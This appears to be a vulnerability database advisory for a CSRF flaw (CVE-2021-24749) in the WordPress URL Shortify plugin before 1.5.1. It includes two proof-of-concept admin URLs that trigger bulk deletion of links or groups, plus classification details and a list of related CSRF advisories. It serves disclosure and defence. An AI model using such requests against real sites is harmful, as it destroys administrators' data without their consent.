URL Shortify < 1.5.1 – Arbitrary Link/Group Deletion via CSRF | CVE 2021-24749 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when bulk-deleting links or groups, which could allow attackers to make a logged in admin delete arbitrary link and group via a CSRF attack.

Proof of Concept

https://example.com/wp-admin/admin.php?page=us_links&action=bulk_delete&link_ids[]=1
https://example.com/wp-admin/admin.php?page=us_groups&action=bulk_delete&group_ids[]=1

Affects Plugins

Fixed in 1.5.1

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

4b4e417d-0ae2-4c3c-81e6-4dcf39eb5697

Timeline

Publicly Published

2021-10-28 (about 4 years ago)

Added

2021-10-28 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2025-02-13

Title

Global Meta Keyword & Description <= 2.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-06-21

Title

UberMenu < 3.8.4 - Cross-Site Request Forgery to Settings Reset

Published

2025-03-24

Title

Custom Script Integration <= 2.1 - Cross-Site Request Forgery

Published

2023-07-19

Title

GTmetrix for WordPress < 0.4.8 - Arbitrary Post Deletion via CSRF

Published

2025-05-19

Title

Japanized For WooCommerce < 2.6.41 - Cross-Site Request Forgery